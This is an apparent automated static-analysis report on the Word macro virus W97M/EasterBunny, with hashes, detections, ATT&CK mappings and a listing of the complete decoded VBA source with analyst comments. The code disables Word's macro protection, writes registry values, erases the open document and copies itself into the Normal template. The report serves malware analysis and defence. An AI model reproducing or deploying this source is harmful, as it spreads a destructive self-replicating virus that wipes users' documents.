W97M/EasterBunny — Office (OLE) malware analysis

Static analysis result for SHA-256 3aa3a972c458523a…

MALICIOUS

Office (OLE)

36.5 KB Created: 2000-08-09 13:51:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1980b333da57f0118d8f33b757cc7976 SHA-1: 8c61af27a7ec841fee0c9c1a649c2e5adac9f379 SHA-256: 3aa3a972c458523a3aeb0bfcc2d5ee31fd4396f2e3b4c4d4db0deaffc4414fad
120 Risk Score

Malware Insights

W97M/EasterBunny · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

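The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Chameleon-12', and it contains VBA macros, including a 'Document_Open' macro, which Word runs automatically when the document is opened. The VBA script, which labels itself 'W97M/EasterBunny', attempts to display a message box and performs other malicious actions upon document opening. As the extracted source below shows, it turns off Word's macro virus protection and save prompts, writes registry values, replaces the text of the active document, and copies its own code into the Normal template or the active document. This is consistent with a macro-based trojan that also self-replicates (a macro virus).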

Heuristics 3

  • ClamAV: Doc.Trojan.Chameleon-12 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Chameleon-12
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12058 bytes
SHA-256: 1155691a05ce255dc3796e47e49f09097ec911f28e709f8b1c1519e70b427639
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Easter_Bunny()
' W97M/Easter Bunny: by Total Konfuzion
' Should spread under Word2000
' Greetingz from the Easter Bunny
'
' Analyst notes (visible payload, invoked from Document_Open):
'   - Destructive: selects the entire active document and deletes it, then
'     types an ASCII-art bunny and a greeting in its place. Document_Open
'     calls this routine before the replication step, and when the active
'     document is the infection target it is then saved over the original
'     file, so the user's content is lost on disk as well.
'   - (Rnd * 0) always evaluates to 0, so "(Rnd * 0) + 1" is 1 and
'     "(Rnd * 0) + 20" is 20. Presumably this avoids literal 0/1/True/False
'     constants that simple signature matching might key on; the intent
'     cannot be confirmed from the sample itself.

    ' Suppress all runtime errors so a failing step never surfaces to the user.
    On Error Resume Next
    
    Dim BlankLine
    
    ' The payload is skipped for a document named "EB.doc"
    ' (presumably the author's own working copy; not confirmable from here).
    If ActiveDocument.Name <> "EB.doc" Then
        ' Switches Word to the blue-background/white-text display option (value is 1).
        Options.BlueScreen = (Rnd * 0) + 1
        
        ' Select from start of document to end of document, then delete the
        ' selection: this wipes the document's existing content.
        With Selection
            .HomeKey unit:=wdStory
            .EndKey unit:=wdStory, Extend:=wdExtend
            .Delete unit:=wdCharacter, Count:=(Rnd * 0) + 1
        End With
        
        ' Write the replacement text: centered, Arial bold 20pt bunny figure,
        ' followed by the greeting in Comic Sans MS.
        With Selection
            .ParagraphFormat.Alignment = wdAlignParagraphCenter
            .Font.Name = "Arial"
            .Font.Bold = (Rnd * 0) + 1
            .Font.Size = (Rnd * 0) + 20
            For BlankLine = 1 To 8
                Selection.TypeParagraph
            Next BlankLine
            .TypeText Text:="()...()"
            .TypeParagraph
            .TypeText Text:="( ' = ' )"
            .TypeParagraph
            .TypeText Text:="(''')(''')"
            For BlankLine = 1 To 3
                Selection.TypeParagraph
            Next BlankLine
            .Font.Name = "Comic Sans MS"
            .TypeText Text:="Happy Easter from the Easter Bunny.. !!"
            ' Bold off (value is 0) and cursor back to the top of the document.
            .Font.Bold = (Rnd * 0)
            .HomeKey unit:=wdStory
        End With
    End If
End Sub
' Analyst notes: auto-execute entry point. Word runs Document_Open when the
' document is opened, subject to the macro security settings in effect.
' In order, the routine:
'   1. weakens Word's built-in protections and hides the menu entries a user
'      would use to inspect macros (ATT&CK T1562.001, Impair Defenses),
'   2. writes registry values (T1112, Modify Registry),
'   3. runs the destructive Easter_Bunny payload,
'   4. copies its own source into Normal.dot or the active document
'      (T1137.001, Office Template Macros, when the target is the template).
' Host indicators visible in this listing:
'   HKLM\Software\Microsoft\Windows\CurrentVersion\  RegisteredOwner / RegisteredOrganization
'   HKCU\Software\Microsoft\Office\                  value named "W97M/EasterBunny"
'   Word user name "Total Konfuzion", initials "TD", address "W97M/EasterBunny"
' (Rnd * 0) always evaluates to 0 (False) throughout.
Private Sub Document_Open()
    ' Suppress all runtime errors; any step that fails is silently skipped.
    On Error Resume Next
    
    ' Announcement box is shown only when the day of the month equals the
    ' current minute, so most opens are silent.
    If Day(Now) = Minute(Now) Then MsgBox "Your system is infected with the Easter Bunny virus.   >8)", vbExclamation + vbSystemModal, "W97M/EasterBunny"
    
    ' Turn off Word's macro virus protection warning, the prompt before saving
    ' changes to the Normal template, and the file-conversion confirmation.
    With Options
        .VirusProtection = (Rnd * 0)
        .SaveNormalPrompt = (Rnd * 0)
        .ConfirmConversions = (Rnd * 0)
    End With
    
    ' PrivateProfileString with an empty file name and a registry path as the
    ' section writes to the registry. The second string literal ends in an
    ' escaped quote, so the stored organization value carries a trailing ".
    With System
        .PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "Total Konfuzion   >8)"
        .PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOrganization") = "W97M/EasterBunny"""
    End With
    
    ' Branch on whether the Office 9.0 security "Level" value exists
    ' (presumably a Word 2000 check, matching the author's header comment).
    ' Either way the menu controls that lead to macro security, the macro
    ' list, templates/add-ins and the style gallery are disabled.
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Security\", "Level") <> "" Then
        CommandBars("Macro").Controls("Security...").Enabled = (Rnd * 0)
    Else
        CommandBars("Tools").Controls("Macro").Enabled = (Rnd * 0)
        CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = (Rnd * 0)
        CommandBars("Format").Controls("Style Gallery...").Enabled = (Rnd * 0)
    End If
    
    ' Disable the cancel key so the user cannot interrupt the macro, and
    ' overwrite the Word user information fields.
    With Application
        .EnableCancelKey = wdCancelDisabled
        .UserName = "Total Konfuzion"
        .UserInitials = "TD"
        .UserAddress = "W97M/EasterBunny"
    End With
    
    ' Destructive payload: replaces the active document's text (see Easter_Bunny).
    Call Easter_Bunny
    
    ' Marker value written under the Office key. It is not read back anywhere
    ' in this listing, so it does not act as an infection check here.
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "W97M/EasterBunny") = "by Total Konfuzion   >8)"
    
    ' Choose the replication target: when the code is running from the active
    ' document the target is the Normal template, otherwise (running from the
    ' template) it is the active document.
    ' NOTE(review): the comparison presumably resolves through the objects'
    ' default property; with errors suppressed a failure would not be visible.
    If ThisDocument = ActiveDocument Then Set Infect = NormalTemplate Else Set Infect = ActiveDocument
    
    ' Read the complete source of this project's first VBA component.
    EB = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
    
    ' Replace all code in the target's first component with that source.
    ' Defender note: later Office versions gate programmatic VBProject access
    ' behind the "Trust access to the VBA project object model" setting;
    ' leaving it disabled blocks this step.
    Set Dest = Infect.VBProject.VBComponents.Item(1).CodeModule
    Dest.DeleteLines 1, Dest.CountOfLines
    Dest.AddFromString EB
    
    ' When the target was the active document, save it in place in Word
    ' document format so the copied macro (and the overwritten text) persists.
    If Infect = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
' Analyst notes: the macro carries the name of a built-in Word command, so it
' presumably runs in place of Help > About when the user picks that menu item.
' It shows the author's banner and then opens the genuine About dialog.
' It makes no changes to documents, templates or the registry.
Sub HelpAbout()
    ' Banner message box (system-modal, information icon).
    MsgBox " « ¤ ° =  Easter Bunny virus.. !!  = ° ¤ »" + Chr(10) + "-------------------------------------------------------------" + Chr(10) + Chr(10) + "         -Total Konfuzion-", vbInformation + vbSystemModal, "Happy Easter from the.."
    ' Hand off to Word's real About dialog so the menu item still appears to work.
    Dialogs(wdDialogHelpAbout).Show
End Sub



' Processing file: /opt/analyzer/scan_staging/534a9e95510f4e4bb75815b88386618a.bin
' ===========================================================================
... (truncated)